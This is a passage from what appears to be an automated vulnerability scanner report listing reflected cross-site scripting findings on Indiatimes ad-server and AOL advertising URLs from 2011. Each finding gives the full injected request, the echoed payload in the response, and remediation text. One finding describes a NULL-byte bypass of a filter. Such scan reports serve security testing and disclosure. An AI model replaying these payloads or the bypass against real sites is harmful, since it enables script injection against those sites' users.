The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9768"-alert(1)-"d9fd94cedaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?&f9768"-alert(1)-"d9fd94cedaf=1 HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:26 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 5490
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670001065000060TIL6203TOIROSMre#82565#KitchenCombo-300x250.txt#41ba4#1211878677#422#S#Right2#www.timesofindia.com/TOI2009_City_Mumbai/index.htm
...[SNIP]...
m/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/540163553/Right2/OasDefault/3670001065000060TIL6203TOIROSMre/KitchenCombo-300x250.txt/33323137376236613465363265346430?&f9768"-alert(1)-"d9fd94cedaf=1", "OAS_AD_Right2", "width=300 height=250", "transparent", "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" ,"6", "FinContentRight21");
           extFlashRight21.onreadystatechange = "";
       }
   
       extFlashRig
...[SNIP]...

6.43. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 269ed"><script>alert(1)</script>4afc035ada6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com269ed"><script>alert(1)</script>4afc035ada6/TOI2009_City_Mumbai/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:12 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com269ed"><script>alert(1)</script>4afc035ada6/TOI2009_City_Mumbai/index.html/673336334/Right1/default/empty.gif/33323137376236613465363265346430" target="_top">
...[SNIP]...

6.44. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0219"><script>alert(1)</script>d7e170f4d3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaib0219"><script>alert(1)</script>d7e170f4d3/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:59 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaib0219"><script>alert(1)</script>d7e170f4d3/index.html/2001034795/Right1/default/empty.gif/33323137376236613465363265346430" target="_top">
...[SNIP]...

6.45. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac330"><script>alert(1)</script>8bdbbc672e5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlac330"><script>alert(1)</script>8bdbbc672e5/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:41:39 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlac330"><script>alert(1)</script>8bdbbc672e5/1242041443/Right1/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.46. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c99"><script>alert(1)</script>77fa4f67160 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/73c99"><script>alert(1)</script>77fa4f67160? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:24 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/73c99"><script>alert(1)</script>77fa4f67160/1220048631/UNKNOWN/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.47. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7af5"><script>alert(1)</script>97dbefd87cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.comf7af5"><script>alert(1)</script>97dbefd87cc/TOI2009_City_Mumbai/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:24 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.comf7af5"><script>alert(1)</script>97dbefd87cc/TOI2009_City_Mumbai/index.html/1388008418/Right2/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.48. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da1cd"><script>alert(1)</script>cfcbc39f7ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaida1cd"><script>alert(1)</script>cfcbc39f7ea/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:10 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaida1cd"><script>alert(1)</script>cfcbc39f7ea/index.html/1588964645/Right2/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.49. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5b33"><script>alert(1)</script>10fd148a5ad was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmla5b33"><script>alert(1)</script>10fd148a5ad/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:49 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmla5b33"><script>alert(1)</script>10fd148a5ad/447911435/Right2/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.50. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef6c"><script>alert(1)</script>5dc7d71f8e3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/8ef6c"><script>alert(1)</script>5dc7d71f8e3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:34 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/8ef6c"><script>alert(1)</script>5dc7d71f8e3/1259692194/UNKNOWN/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.51. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 604b5"><script>alert(1)</script>b89ca73124c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com604b5"><script>alert(1)</script>b89ca73124c/TOI2009_TOPICS/index.html/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:41:19 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com604b5"><script>alert(1)</script>b89ca73124c/TOI2009_TOPICS/index.html/967381076/Right1/default/empty.gif/33323137376236613465363266323830" target="_top">
...[SNIP]...

6.52. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ba3"><script>alert(1)</script>da433ca3c57 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICSf2ba3"><script>alert(1)</script>da433ca3c57/index.html/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:42:04 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICSf2ba3"><script>alert(1)</script>da433ca3c57/index.html/906137717/Right1/default/empty.gif/33323137376236613465363266323830" target="_top">
...[SNIP]...

6.53. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece0f"><script>alert(1)</script>278f26d0209 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.htmlece0f"><script>alert(1)</script>278f26d0209/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:42:44 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICS/index.htmlece0f"><script>alert(1)</script>278f26d0209/599573279/Right1/default/empty.gif/33323137376236613465363266323830" target="_top">
...[SNIP]...

6.54. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00aceb6"-alert(1)-"3a68e560875 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aceb6"-alert(1)-"3a68e560875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1?%00aceb6"-alert(1)-"3a68e560875=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:12:20 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 2393
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000870000020FARMERSM6209TOIR#80769#3670000033000020.html#88449#1312539346#422#Hc#Right1#www.timesofindia.com/TOI2009_TOPICS/index.html##
--
...[SNIP]...
/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1"+RMRAND()+"/"+CounterPos+"/OasDefault/3670000870000020FARMERSM6209TOIR/"+CounterID+"/33323137376236613465363266323830?%00aceb6"-alert(1)-"3a68e560875=1";
//-->
...[SNIP]...

6.55. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4746"-alert(1)-"745afd83776 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c4746"-alert(1)-"745afd83776/0/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c4746"-alert(1)-"745afd83776/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.56. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 528e8"-alert(1)-"3333f1c57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

